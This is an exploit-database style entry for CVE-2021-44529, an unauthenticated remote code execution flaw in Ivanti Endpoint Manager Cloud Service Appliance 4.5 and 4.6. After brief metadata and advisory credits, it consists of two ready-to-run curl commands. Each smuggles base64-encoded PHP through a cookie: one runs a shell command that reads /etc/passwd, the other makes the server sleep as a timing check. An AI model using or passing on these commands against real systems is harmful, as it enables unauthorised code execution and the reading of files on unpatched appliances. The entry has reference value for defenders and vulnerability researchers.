Ivanti Endpoint Manager CSA versions 4.5 and 4.6 suffer from an unauthenticated remote code execution vulnerability.
59d3bc20720bd412425b82923627b636# Exploit Title: Ivanti Endpoint Manager - Cloud Service Appliance (Unauthenticated Remote Code Execution)
# Date: 20/03/2022
# Exploit Author: d7x
# Vendor Homepage: https://www.ivanti.com/
# Software Link: https://forums.ivanti.com/s/article/Customer-Update-Cloud-Service-Appliance-4-6
# Version: CSA 4.6 4.5 - EOF Aug 2021
# Tested on: Linux x86_64 # CVE : CVE-2021-44529
# CVE : CVE-2021-44529
###
This is the RCE exploit for the following advisory (officially discovered by Jakub Kramarz):
https://forums.ivanti.com/s/article/SA-2021-12-02?language=en_US
Shoutouts to phyr3wall for providing a hint to where the obfuscated code relies
@d7x_real
https://d7x.promiselabs.net
https://www.promiselabs.net
###
# cat /etc/passwd
curl -i -s -k -X $'GET' -b $'e=ab; exec=c3lzdGVtKCJjYXQgL2V0Yy9wYXNzd2QiKTs=; pwn=; LDCSASESSID=' 'https://.../client/index.php' | tr -d "\n" | grep -zPo '<c123>\K.*?(?=</c123>)'; echo
# sleep for 10 seconds
curl -i -s -k -X $'GET' -b $'e=ab; exec=c2xlZXAoMTApOw==; pwn=; LDCSASESSID=' 'https://.../client/index.php' | tr -d "\n" | grep -zPo '<c123>\K.*?(?=</c123>)'; echo